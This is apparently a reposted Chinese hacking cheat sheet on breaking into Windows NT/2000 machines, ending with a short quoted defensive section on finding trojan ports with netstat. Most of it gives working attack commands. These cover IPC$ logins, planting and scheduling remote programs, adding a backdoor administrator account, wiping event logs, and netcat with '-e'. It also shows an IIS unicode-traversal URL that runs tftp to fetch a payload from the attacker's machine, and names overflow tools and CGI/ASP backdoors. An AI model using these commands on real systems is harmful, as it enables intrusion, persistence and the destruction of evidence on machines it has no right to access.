| 关键词: nbsp 地址 端口 url ip 0.0 命令 远程 file 主机 |
(与远程主机建立空管连接) net use [url=file://\\ip]\\ip[/url]地址\ipc$ "" /use:"" (以管理员身份登录远程主机) net use [url=file://\\ip]\\ip[/url]地址\ipc$ "密码" /use:"administrator" (传送文件到远程主机winnt目录下)copy 本机目录路径\程序 [url=file://\\ip]\\ip[/url]地址\admin$ (查看远程主机时间) net time [url=file://\\ip]\\ip[/url]地址 (定时启动某个程序) at [url=file://\\ip]\\ip[/url]地址 02:18 readme.EⅩE (查看共享) net view [url=file://\\ip]\\ip[/url]地址 (查看netbios工作组列表) nbtstat -a ip地址 (将远程主机c盘映射为自己的f盘) net use f: [url=file://\\ip]\\ip[/url]地址\c$ ""/user:"administrator" (这两条把自己增加到管理员组): net user 用户名 密码 /add net localgroup administrators 用户名 /add (断开连接) net use [url=file://\\ip]\\ip[/url]地址\ipc$ /delete del c:\winnt\system32\logfiles\*.* del c:\winnt\ssytem32\config\*.evt del c:\winnt\system32\dtclog\*.* del c:\winnt\system32\*.log del c:\winnt\system32\*.txt del c:\winnt\*.txt del c:\winnt\*.log 一、netsvc.EⅩE 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: netsvc /list [url=file://\\ip]\\ip[/url]地址 netsvc schedule [url=file://\\ip]\\ip[/url]地址 /query netsvc [url=file://\\ip]\\ip[/url]地址 schedule /start 二、opentelnet.EⅩE 远程启动主机的telnet服务,并绑定端口到7878,例如: opentelnet [url=file://\\ip]\\ip[/url]地址 用户名 密码 1 7878 然后就可以telnet到主机的7878端口,进入dos方式下: telnet ip地址 7878 三、winshell.EⅩE 一个非常小的木马(不到6k),telnet到主机的7878端口,输入密码winshell,当看到cmd>后,可打下面的命令: p path (查看winshell主程序的路径信息) b reboot (重新启动机器) d shutdown (关闭机器) s shell (执行后你就会看到可爱的“c:\>”) x exit (退出本次登录会话,此命令并不终止winshell的运行) cmd> http://srv.EⅩE (通过http下载其他网站上的文件到运行winshell的机器上) 四、3389登陆器,gui方式登录远程主机的 五、elsave.EⅩE 事件日志清除工具 elsave -s [url=file://\\ip]\\ip[/url]地址 -l "application" -c elsave -s [url=file://\\ip]\\ip[/url]地址 -l "system" -c elsave -s [url=file://\\ip]\\ip[/url]地址 -l "security" -c 执行后成功清除应用程序日志,系统日志,安全日志 六、hbulot.EⅩE 开启win2kserver和winxp的3389服务 hbulot [/r] 使用/r表示安装完成后自动重起目标使设置生效。 七、nc.EⅩE(netcat.EⅩE) 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 想要连接到某处: nc [-options] hostname port [ports] ... 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数:-e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point, up to 8 -g num source-routing pointer: 4, 8, 12, ... -h 帮助信息 -i secs 延时的间隔 -l 禁用词语模式,用于入站连接 -n 指定数字的ip地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -u udp模式 -v 详细输出——用两个-v可得到更详细的内容 -w secs timeout的时间 -z 将输入输出关掉——用于扫描时 八、tftpd32.EⅩE 把自己的电脑临时变为一台ftp服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用unicode漏洞或telnet到肉鸡,例如: http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.EⅩE?/c tftp -i 本机ip地址 get 文件名 c:\winnt\system32\文件名 然后可以直接令文件运行: http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.EⅩE?/c+文件名 九、prihack.EⅩE是iis的printer远程缓冲区溢出工具 idqover.EⅩE是溢出idq的,选择“溢出后在一个端口禁用词语”,然后用telnet连接它的禁用词语端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.EⅩE是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 ntis.EⅩE、cmd.EⅩE和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有asp执行权限的目录。然后用ie浏览器连接。 十、弱口令 在nt\2000\xp\2003中弱口令可以用 Net use \ip “password” /user:user 如果目标机开3389服务,可以直接连接 在sql的sa弱口令可以用sql连接器直接 ·登陆 后门木马 如果有ipc$共享,可以copy过去木马后门 用at启动 AT \ip time /INTERACTIVE 如果可以得到shell,也可以用tftp Tftp.EⅩE ?Ci ip get *.* *.* 然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行 引用: 管理特殊端口——防范木马攻击. 木马是一种带有恶意性质的远程控制软件,木马一般分为客户端(Client)和服务器端(Server),客户端就是本地使用的各种命令的控制台,服务器端则是给别人运行,只有运行过服务器端的计算机才能够完全受控。 当前最为常见的木马通常是基于TCP/UDP协议进行client端与server端之间的通讯的,既然利用到这两个协议,就不可避免要在server端(就是被种了木马的机器了)打开禁用词语端口来等待连接。例如鼎鼎大名的冰河使用的禁用词语端口是7626,Back Orifice2000则是使用54320等等。那么,我们可以利用查看本机开放端口的方法来检查自己是否被种了木马或其它hacker程序。以下是详细方法介绍。 Windows本身自带的netstat命令 Netstat显示协议统计和当前的 TCP/IP 网络连接。该命令只有在安装了 TCP/IP 协议后才可以使用。 netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval] 参数 -a 显示所有连接和侦听端口。服务器连接通常不显示。 -e 显示以太网统计。该参数可以与 -s 选项结合使用。 -n 以数字格式显示地址和端口号(而不是尝试查找名称)。 -s 显示每个协议的统计。默认情况下,显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集。 -p protocol 显示由 protocol 指定的协议的连接;protocol 可以是 tcp 或 udp。如果与 -s 选项一同使用显示每个协议的统计,protocol 可以是 tcp、udp、icmp 或 ip。 -r 显示路由表的内容。 interval 重新显示所选的统计,在每次显示之间暂停 interval 秒。按 CTRL+B 停止重新显示统计。如果省略该参数,netstat 将打印一次当前的配置信息。 现在,我们掌握netstat命令的使用方法了,下面就让我们现学现用,用这个命令看一下自己的机器开放的端口。进入到命令行下,使用netstat命令的a和n两个参数: C:netstat -a -n Active Connections Proto Local ADDRess Foreign Address State TCP 0.0.0.0:80 0.0.0.0:0 LISTENING TCP 0.0.0.0:21 0.0.0.0:0 LISTENING TCP 0.0.0.0:7626 0.0.0.0:0 LISTENING UDP 0.0.0.0:445 0.0.0.0:0 UDP 0.0.0.0:1046 0.0.0.0:0 UDP 0.0.0.0:1047 0.0.0.0:0 解释一下,Active Connections是指当前本机活动连接,Proto是指连接使用的协议名称,LocalAddress是本地计算机的 IP 地址和连接正在使用的端口号,Foreign Address是连接该端口的远程计算机的 IP地址和端口号,State则是表明TCP连接的状态,你可以看到后面三行的禁用词语端口是UDP协议的,所以没有State表示的状态。通过以上可以看出该机器的7626端口已经开放,正在禁用词语等待连接,像这样的情况极有可能是已经感染了冰河!所以应该急忙断开网络,并用杀毒软件查杀病毒。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|